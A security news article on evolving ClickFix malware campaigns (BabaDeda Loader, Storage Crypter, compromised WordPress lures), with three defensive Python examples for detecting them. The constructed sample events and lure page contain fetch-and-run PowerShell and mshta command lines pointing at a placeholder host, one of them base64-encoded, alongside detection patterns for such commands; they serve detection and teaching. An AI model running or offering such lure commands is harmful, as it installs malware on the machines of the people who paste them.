ClickFix Campaigns Evolve with New Malware Loaders and Deceptive Tactics

Recent cybersecurity analyses have identified a surge in ClickFix campaigns deploying advanced malware loaders, notably BabaDeda Loader, Lorem Ipsum Loader, and Potemkin. These developments have been detailed in reports from security firms such as Morphisec, BlueVoyant, and Huntress.

In April 2026, BabaDeda Loader was observed targeting educational and financial institutions. This loader, an evolution of earlier BabaDeda activity, now exhibits enhanced stealth, evasion capabilities, and payload flexibility. The attack begins with a ClickFix lure: a fake prompt or fix-it dialog that walks the user through copying a command and running it themselves, so the malicious PowerShell is launched by the victim's own hand rather than by an exploit, and controls that watch for downloaded executables never see a file arrive. Once running, the loader uses hidden PowerShell scripts, in-memory shellcode execution, DLL side-loading, and externally stored payloads to deploy information stealers and remote access trojans (RATs).

Originally documented by Morphisec in November 2021, BabaDeda was associated with campaigns targeting the cryptocurrency and Web3 sectors, distributing information stealers, RATs, and LockBit ransomware. The loader’s current iteration profiles the host system, avoids execution on Russian or Belarusian machines, and checks for security products before injecting the main payload into trusted Windows processes like “svchost.exe.” The deployed malware can collect system information, extract browser data, traverse directories, capture screenshots, execute shell commands, and communicate with command-and-control servers over encrypted channels.
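The two paragraphs above describe the ClickFix entry point (a user-launched PowerShell command) and the loader that follows it. The detection logic below is an added example written for this page, not code from Morphisec or the reports cited; it runs over constructed, Sysmon-style process-creation records (assumed "|"-separated key=value fields, not real telemetry) and flags script hosts that were started from explorer.exe with command-line traits a person rarely types by hand. The indicator list and the set of launcher and script-host names are assumptions for illustration.

```python
import re

# Constructed, Sysmon-style process-creation records for illustration only
# (not real telemetry). Fields are "|"-separated key=value pairs; a real
# parser would consume the XML/JSON your SIEM emits instead.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -w hidden -ep bypass -c \"iex (irm https://example.invalid/fix)\"",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\notepad.exe"
    "|CommandLine=notepad.exe C:\\Users\\alice\\notes.txt",
    "ParentImage=C:\\Program Files\\Microsoft VS Code\\Code.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -NoLogo -NoExit",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\mshta.exe"
    "|CommandLine=mshta https://example.invalid/verify.hta",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\cmd.exe"
    "|CommandLine=cmd /c powershell -EncodedCommand SQBFAFgA",
]

# ClickFix lures have the user launch the command from the Run dialog, the
# Explorer address bar or a similar shell surface, so the script host's parent
# is explorer.exe rather than a browser, an IDE or a scheduled task.
# (Assumed sets; extend them for your environment.)
LAUNCHER_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line traits that rarely appear when a person types a command by hand.
INDICATORS = [
    (re.compile(r"(?i)(^|\s)-(w|win|windowstyle)\s+hidden"), "hidden window"),
    (re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)(\s|$)"), "encoded command"),
    (re.compile(r"(?i)\biex\b|invoke-expression"), "Invoke-Expression"),
    (re.compile(r"(?i)\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b"), "remote download"),
    (re.compile(r"(?i)\bmshta\b.*https?://"), "mshta remote HTA"),
    (re.compile(r"(?i)-(ep|executionpolicy)\s+bypass"), "execution policy bypass"),
]


def parse_event(line: str) -> dict:
    """Split one constructed record into a field dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_reasons(event: dict) -> list:
    """Return the indicator labels that fire for one process-creation event.

    An empty list means the event does not match the ClickFix shape: either
    the parent is not a shell launcher or the child is not a script host, or
    the command line carries no suspicious trait. Lineage and traits are both
    required, so an analyst opening PowerShell from the Start menu (parent
    explorer.exe, plain command line) does not trip the rule on its own.
    """
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    if parent not in LAUNCHER_PARENTS or child not in SCRIPT_HOSTS:
        return []
    cmd = event.get("CommandLine", "")
    return [label for pattern, label in INDICATORS if pattern.search(cmd)]


def find_clickfix_candidates(lines) -> list:
    """Map each suspicious record to (child image name, reasons)."""
    hits = []
    for line in lines:
        event = parse_event(line)
        reasons = clickfix_reasons(event)
        if reasons:
            hits.append((image_name(event["Image"]), reasons))
    return hits


if __name__ == "__main__":
    for name, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"{name}: {', '.join(reasons)}")
```

The rule fires on three of the five constructed records (the hidden-window PowerShell one-liner, the remote HTA, and the encoded command behind cmd.exe) and stays silent on the PowerShell session started by an IDE. When triaging a hit, the Run dialog's history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU is the artifact that confirms the user pasted the command themselves.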

Another delivery chain uses a ZIP archive in which a legitimate application executable side-loads an attacker-supplied DLL placed beside it, ultimately deploying DanaBot and SectopRAT (also known as ArechClient). These attacks feature a staged loader component called Storage Crypter, which does not carry its payload itself but reads it from a separate, non-executable file in the package, such as “List.Control.dat.” Because the payload is stored encoded and decoded only just before execution, a scan of the executable or DLL in isolation shows no payload, and a forensic examination that recovers only the DLL without its companion data file cannot reconstruct what actually ran; the whole package has to be preserved together.
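A practical triage step for the package layout described above is to look for the pieces that characterise it: a non-executable, high-entropy file sitting next to an executable/DLL pair. The script below is an added example for this page, not a tool from any of the vendors cited; it uses a constructed in-memory stand-in for an extracted archive (random bytes play the role of the encoded payload, and the file names, entropy threshold and size cut-off are assumptions). It deliberately skips files whose magic numbers mark them as compressed or image formats, which are high-entropy for legitimate reasons and would otherwise be the main source of false positives.

```python
import math
import random
from collections import Counter

# Magic numbers of file types that are legitimately high-entropy (compressed
# or image data), so they must not be mistaken for payload containers.
COMPRESSED_MAGICS = (b"\x89PNG", b"PK\x03\x04", b"\x1f\x8b", b"\xff\xd8\xff", b"%PDF")
ENTROPY_THRESHOLD = 7.2   # bits/byte (assumed); text is ~4-5, native code ~6-6.5
MIN_SIZE = 1024           # ignore tiny files, whose entropy estimate is noisy


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 to 8.0) over the byte histogram."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def is_pe(data: bytes) -> bool:
    """Crude PE check on the DOS header magic."""
    return data[:2] == b"MZ"


def triage_package(files: dict) -> dict:
    """Flag payload containers and side-load pairs in an extracted package.

    `files` maps a relative path to its bytes. Returns two lists:
      payload_candidates: non-PE, non-compressed files whose entropy suggests
                          an encoded blob (the "List.Control.dat" pattern);
      sideload_pairs:     (exe, dll) pairs sharing a directory, i.e. the DLLs
                          the loader in that directory would resolve first.
    """
    payloads = []
    for name, data in files.items():
        if len(data) < MIN_SIZE or is_pe(data):
            continue
        if any(data.startswith(m) for m in COMPRESSED_MAGICS):
            continue
        ent = shannon_entropy(data)
        if ent >= ENTROPY_THRESHOLD:
            payloads.append({"name": name, "entropy": round(ent, 3), "size": len(data)})

    by_dir = {}
    for name, data in files.items():
        d, _, base = name.replace("\\", "/").rpartition("/")
        by_dir.setdefault(d, []).append((base, data))
    pairs = []
    for entries in by_dir.values():
        exes = [b for b, data in entries if b.lower().endswith(".exe") and is_pe(data)]
        dlls = [b for b, data in entries if b.lower().endswith(".dll") and is_pe(data)]
        pairs.extend((exe, dll) for exe in exes for dll in dlls)
    return {"payload_candidates": payloads, "sideload_pairs": pairs}


# Constructed stand-in for an extracted archive (not a real sample): a carrier
# executable, a DLL beside it, a high-entropy .dat file, a text file and a PNG.
# Seeded random bytes stand in for an encoded payload so the run is repeatable.
_rng = random.Random(2024)
SAMPLE_PACKAGE = {
    "Viewer/Viewer.exe": b"MZ" + b"\x00" * 2000 + b"This program cannot be run in DOS mode.",
    "Viewer/version.dll": b"MZ" + b"\x90" * 1500,
    "Viewer/List.Control.dat": _rng.randbytes(4096),
    "Viewer/readme.txt": b"Open Viewer.exe to view the document.\n" * 40,
    "Viewer/logo.png": b"\x89PNG\r\n\x1a\n" + _rng.randbytes(2048),
}


if __name__ == "__main__":
    result = triage_package(SAMPLE_PACKAGE)
    for p in result["payload_candidates"]:
        print(f"payload candidate: {p['name']} ({p['size']} bytes, entropy {p['entropy']})")
    for exe, dll in result["sideload_pairs"]:
        print(f"side-load pair: {exe} -> {dll}")
```

On the constructed package only List.Control.dat is reported as a payload candidate (the PNG is just as random but is excluded by its magic), and Viewer.exe/version.dll is listed as the side-load pair to examine next. Entropy alone is a triage signal, not a verdict: the confirmation is to run the executable in a sandbox with and without the .dat file present and compare behaviour.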

These findings highlight how modular modern loader frameworks have become. Separating delivery, storage, execution, and payload deployment into distinct components means no single artifact contains the whole chain and any one stage can be swapped without touching the others, which makes the frameworks both more flexible for the operator and harder to detect.

ClickFix techniques have also been observed in campaigns that use compromised WordPress sites as launch points. Visitors are shown deceptive lures, including fake update prompts, that instruct them to run a command themselves, and doing so leads to a malware infection.
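A web-side check for lures of the kind described above looks for the two things such a page needs: a script that writes to the visitor's clipboard, and a command-like string for it to write. The scanner below is an added example for this page, not code from any of the firms cited; the lure page it scans is constructed (no real site), and the API patterns, command keywords and the base64 handling are assumptions about how these pages are typically built. The command in the sample is base64-encoded so that a naive grep for "powershell" in the HTML would miss it, which is the case the scanner is written to handle.

```python
import base64
import re

# APIs a page uses to put text on the visitor's clipboard without a copy gesture.
CLIPBOARD_WRITES = [
    re.compile(r"navigator\.clipboard\.writeText\s*\("),
    re.compile(r"document\.execCommand\s*\(\s*['\"]copy['\"]"),
]
# Script hosts and downloaders a lure command usually starts with (assumed list).
COMMAND_HINTS = re.compile(r"(?i)\b(powershell|pwsh|mshta|cmd\s*/c|wscript|cscript|certutil|curl)\b")
# Run-dialog instructions that usually accompany the copied command.
RUN_HINTS = re.compile(r"(?i)win\s*\+\s*r|windows\s*\+\s*r|ctrl\s*\+\s*v|run dialog|terminal")

# Crude tokenizer for quoted JS/HTML string literals; not a JS parser, so an
# apostrophe in prose can throw it off. Good enough for a first pass.
STRING_LITERAL = re.compile(r"""(['"])((?:\\.|(?!\1).)*)\1""")
BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def string_literals(source: str) -> list:
    """Every single- or double-quoted string literal in the page."""
    return [m.group(2) for m in STRING_LITERAL.finditer(source)]


def decoded_forms(literal: str):
    """Yield the literal and, where it is valid base64, its decoded text."""
    yield literal
    token = literal.strip()
    if BASE64_TOKEN.fullmatch(token):
        try:
            yield base64.b64decode(token, validate=True).decode("utf-8", "ignore")
        except ValueError:      # binascii.Error is a ValueError
            return


def scan_page(html: str) -> dict:
    """Collect the clipboard write, the run instructions and any command-like strings."""
    writes_clipboard = any(p.search(html) for p in CLIPBOARD_WRITES)
    commands = [form for lit in string_literals(html) for form in decoded_forms(lit)
                if COMMAND_HINTS.search(form)]
    return {
        "clipboard_write": writes_clipboard,
        "run_instructions": bool(RUN_HINTS.search(html)),
        "commands": commands,
    }


def is_clickfix_lure(html: str) -> bool:
    """Clipboard write plus a command-like string; a plain 'copy link' button is not enough."""
    r = scan_page(html)
    return r["clipboard_write"] and bool(r["commands"])


# Constructed lure page (not taken from any real site). Building the base64 at
# runtime keeps the sample honest without hand-encoding it.
_LURE_COMMAND = b'powershell -w hidden -c "iex (irm https://example.invalid/update)"'
_ENCODED = base64.b64encode(_LURE_COMMAND).decode()
LURE_PAGE = f"""
<div class="update-modal">
  <h2>Update required</h2>
  <p>Your browser needs an update to display this site. Press Win+R, then Ctrl+V, then Enter.</p>
  <button id="fix">Update now</button>
</div>
<script>
var cmd = atob("{_ENCODED}");
document.getElementById("fix").onclick = function () {{ navigator.clipboard.writeText(cmd); }};
</script>
"""

# Constructed benign page: writes to the clipboard, but only a URL.
BENIGN_PAGE = """
<button onclick="navigator.clipboard.writeText('https://example.invalid/post/42')">Copy link</button>
"""

if __name__ == "__main__":
    print(scan_page(LURE_PAGE))
    print("lure:", is_clickfix_lure(LURE_PAGE), "benign:", is_clickfix_lure(BENIGN_PAGE))
```

The benign page also writes to the clipboard, which is why the verdict requires a command-like string as well; requiring both keeps ordinary "copy link" buttons out of the alert queue. For a WordPress fleet the same check can be pointed at the theme and plugin files on disk, where injected lure scripts usually live, rather than at rendered pages.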

The continuous advancement of ClickFix campaigns underscores the need for heightened vigilance. Because the chain depends on the user running a command themselves, the most durable countermeasures are user education (no legitimate website, update prompt or fix-it dialog asks you to paste a command into the Run dialog or a terminal) and detection of script hosts such as powershell.exe or mshta.exe launched from explorer.exe with hidden-window, encoded or download-and-execute arguments. Organizations should also keep endpoint protection and operating systems current, and treat any such alert as a prompt to review the full process lineage rather than the single command line.